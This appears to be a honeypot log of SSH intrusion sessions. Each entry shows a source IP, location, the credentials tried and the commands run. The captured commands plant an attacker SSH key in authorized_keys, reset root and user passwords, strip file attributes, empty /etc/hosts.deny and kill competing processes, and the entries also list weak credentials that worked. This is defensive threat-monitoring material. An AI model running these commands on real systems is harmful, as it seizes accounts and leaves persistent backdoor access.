$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "grid\nFbUq0LVUGt7N\nFbUq0LVUGt7N"|passwd|bash
$ Enter new UNIX password:
$ echo "grid\nFbUq0LVUGt7N\nFbUq0LVUGt7N\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 capoeira_root_12 (190.89.55.250) β€” Inhumas, Brazil Β· 2 sessions Β· 2 cmds
2026-05-21 12:43 EDT Β· as root/blackcat, root/swissmp@$%2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 dragon_root_20 (115.190.172.63) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-22 04:48 EDT Β· as jenkins/jenkins@2024
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "jenkins@2024\n1dbS8h4muAqW\n1dbS8h4muAqW"|passwd|bash
$ Enter new UNIX password:
$ echo "jenkins@2024\n1dbS8h4muAqW\n1dbS8h4muAqW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 crepe_root_12 (193.70.86.103) β€” Gravelines, France Β· 1 session Β· 19 cmds
2026-05-22 04:22 EDT Β· as root/1qaz1QAZ
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:TucOxcYDPCAO"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_21 (180.100.198.68) β€” Nanjing, China Β· 1 session Β· 19 cmds
2026-05-22 04:19 EDT Β· as root/P@ssw0rd@2026
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:GZ5iHnrjraE4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_83 (103.154.241.40) β€” Yangon, Myanmar Β· 1 session Β· 19 cmds
2026-05-22 04:01 EDT Β· as root/Ab123456+
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:5JSiSkbcTUwP"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 scone_root_7 (217.154.38.181) β€” Worcester, United Kingdom Β· 1 session Β· 19 cmds
2026-05-22 03:57 EDT Β· as root/asd1230.
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:wP6jF5puHlmI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_67 (186.118.142.245) β€” BogotΓ‘, Colombia Β· 3 sessions Β· 58 cmds
2026-05-22 02:53 EDT Β· as kontakt/kontakt, root/P@55word123, root/aa11
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:Zl62i5pfDLeB"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "kontakt\nbl5gjNYtdWG6\nbl5gjNYtdWG6"|passwd|bash
$ Enter new UNIX password:
$ echo "kontakt\nbl5gjNYtdWG6\nbl5gjNYtdWG6\n"|passwd
$ echo "root:OCv7RsXwhro2"|chpasswd|bash
🎭 burger_5 (130.12.47.8) β€” Fremont, United States Β· 1 session Β· 20 cmds
2026-05-22 03:20 EDT Β· as ftpuser/ftp1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ftp1234\nC02PPedadzoq\nC02PPedadzoq"|passwd|bash
$ Enter new UNIX password:
$ echo "ftp1234\nC02PPedadzoq\nC02PPedadzoq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chai_root_18 (103.123.53.88) β€” Mumbai, India Β· 1 session Β· 20 cmds
2026-05-22 03:10 EDT Β· as mobiquity/mobiquity
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mobiquity\nlh0nY3pPSrdM\nlh0nY3pPSrdM"|passwd|bash
$ Enter new UNIX password:
$ echo "mobiquity\nlh0nY3pPSrdM\nlh0nY3pPSrdM\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty_root_27 (216.172.190.116) β€” Atlanta, United States Β· 1 session Β· 19 cmds
2026-05-22 02:59 EDT Β· as root/Talent123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:2g9PTvRsfrkq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 steppe_root_5 (147.45.48.17) β€” Novosibirsk, Russia Β· 1 session Β· 2 cmds
2026-05-22 02:41 EDT Β· as root/aa11
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 cowboy_root_39 (72.14.147.203) β€” Dover, United States Β· 2 sessions Β· 38 cmds
2026-05-22 01:53 EDT Β· as root/123456@Abc, root/walter
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:cUevvOl5mQgf"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:qIpXRDHaUZlI"|chpasswd|bash
🎭 shadow_root_9 (165.154.205.128) β€” Singapore, Singapore Β· 3 sessions Β· 58 cmds
2026-05-14 11:20 EDT Β· as pakchoi/Kermit123@, root/123456@Abc, root/walter
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:rRkYKPMwLcCe"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:qpd6XWy1AEKe"|chpasswd|bash
$ echo -e "Kermit123@\nwrWth9ViPAaY\nwrWth9ViPAaY"|passwd|bash
$ Enter new UNIX password:
$ echo "Kermit123@\nwrWth9ViPAaY\nwrWth9ViPAaY\n"|passwd
🎭 bibimbap_root_11 (222.110.147.56) β€” Eunpyeong-gu, South Korea Β· 3 sessions Β· 58 cmds
2026-05-17 04:03 EDT Β· as exam/exam, root/123456@Abc, root/walter
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:ZsOTP4wRNgfn"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:Lri3g6vRnUIS"|chpasswd|bash
$ echo -e "exam\nbMosTId8KhDF\nbMosTId8KhDF"|passwd|bash
$ Enter new UNIX password:
$ echo "exam\nbMosTId8KhDF\nbMosTId8KhDF\n"|passwd
🎭 specter_root_77 (102.210.149.236) β€” Johannesburg, South Africa Β· 1 session Β· 19 cmds
2026-05-22 01:49 EDT Β· as root/123456@Abc
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
